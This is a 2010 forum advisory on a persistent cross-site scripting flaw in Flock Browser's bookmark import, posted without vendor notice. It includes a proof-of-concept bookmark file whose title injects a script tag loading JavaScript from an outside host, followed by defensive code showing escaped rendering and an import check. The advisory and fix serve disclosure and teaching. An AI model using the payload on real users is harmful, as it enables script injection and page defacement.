
Flock Browser 3.0.0.3989 Malformed Bookmark XSS



Post by andry, Wed Sep 15, 2010 3:36 am

#########################################
Flock Browser 3.0.0.3989 Malformed Bookmark XSS
Vendor URL: http://beta.flock.com/
Vendor notified: NO. Exploits available: YES
#########################################

Flock is faster, simpler, and more friendly. Literally.
It's the only sleek, modern web browser with the built-in
ability to keep you up-to-date with your Facebook and Twitter
friends. This browser version (3.0.0.3989) is based on an old
Chromium project.


Flock has a flaw that allows cross-site scripting style attacks.
In bookmarks it has a malformed bookmark title persistent XSS,
triggered when importing a malformed bookmark from other browsers, when adding
a new malformed bookmark, or when importing a bookmark HTML file.

###############################
Example Of Bookmark html file
###############################

<!DOCTYPE NETSCAPE-Bookmark-file-1>
<!-- This is an automatically generated file.
It will be read and overwritten.
DO NOT EDIT! -->
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8">
<TITLE>Bookmarks</TITLE>
<H1>Menú Marcadores</H1>
<DL><p>
<DT><A HREF="http://www.mozilla.org" ADD_DATE="1282083605" LAST_MODIFIED="1282083638">&quot;&gt;&lt;script
src='http://vuln.xssed.net/thirdparty/scripts/ckers.org.js'&gt;</A>
</DL><p>

#####################EOF##################

It is a persistent script insertion, and when the user clicks in the menu to view
the favorites page or accesses the favorites URL directly, this makes a "defacement" of that page, and then the user can't access the favorites :)
( URL of favorites => chrome-extension://flock_people/favorites.html#p=1&v=all&o=0&s=title )

################# End #######################
andry
Moderator

Posts : 467
Join date : 2010-05-07
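The bug described in this post is a rendering problem: the title stored in the bookmark file is entity-encoded, the importer decodes it, and the favorites page then splices the raw title into its own markup. The following is an added example, not code from the post or from Flock: it parses a constructed Netscape-format export like the one above (the injected title uses a harmless `<b>` tag instead of a script), shows the unsafe concatenation beside the escaped version, and includes an import-time check a defender can log on.

```javascript
// Constructed sample export (not from the advisory); the second title carries
// markup in the same position as the malformed bookmark, using harmless tags.
const SAMPLE_EXPORT = `<!DOCTYPE NETSCAPE-Bookmark-file-1>
<TITLE>Bookmarks</TITLE>
<DL><p>
<DT><A HREF="http://www.mozilla.org" ADD_DATE="1282083605">Mozilla</A>
<DT><A HREF="http://example.com/" ADD_DATE="1282083606">&quot;&gt;&lt;b&gt;injected&lt;/b&gt;</A>
</DL><p>`;

const ENTITIES = { quot: '"', lt: '<', gt: '>', amp: '&', apos: "'" };
const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// An importer decodes the entities stored in the file, yielding the raw title.
function decodeEntities(text) {
  return text.replace(/&(quot|lt|gt|amp|apos);/g, (_, name) => ENTITIES[name]);
}

// Extract {href, title} from each <DT><A ...>title</A> entry.
function parseBookmarks(exportHtml) {
  const entry = /<DT><A\s+HREF="([^"]*)"[^>]*>([\s\S]*?)<\/A>/gi;
  const bookmarks = [];
  let m;
  while ((m = entry.exec(exportHtml)) !== null) {
    bookmarks.push({ href: m[1], title: decodeEntities(m[2]) });
  }
  return bookmarks;
}

// Escape the characters that matter in HTML text and attribute context.
function escapeHtml(text) {
  return text.replace(/[&<>"']/g, (c) => ESCAPES[c]);
}

// Vulnerable pattern: the raw title is spliced into the page markup, so a
// title like "><b>injected</b> closes the <a> and adds its own elements.
function renderFavoritesUnsafe(bookmarks) {
  return bookmarks.map((b) => `<li><a href="${b.href}">${b.title}</a></li>`).join('\n');
}

// Fixed pattern: every untrusted field is escaped before it reaches the markup.
function renderFavoritesSafe(bookmarks) {
  return bookmarks
    .map((b) => `<li><a href="${escapeHtml(b.href)}">${escapeHtml(b.title)}</a></li>`)
    .join('\n');
}

// Import-time check worth logging: a bookmark title should not contain markup.
function titleContainsMarkup(title) {
  return /[<>"]/.test(title);
}
```

Running `renderFavoritesUnsafe(parseBookmarks(SAMPLE_EXPORT))` yields a list item containing a live `<b>` element, while the safe renderer emits `&quot;&gt;&lt;b&gt;injected&lt;/b&gt;` as inert text.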
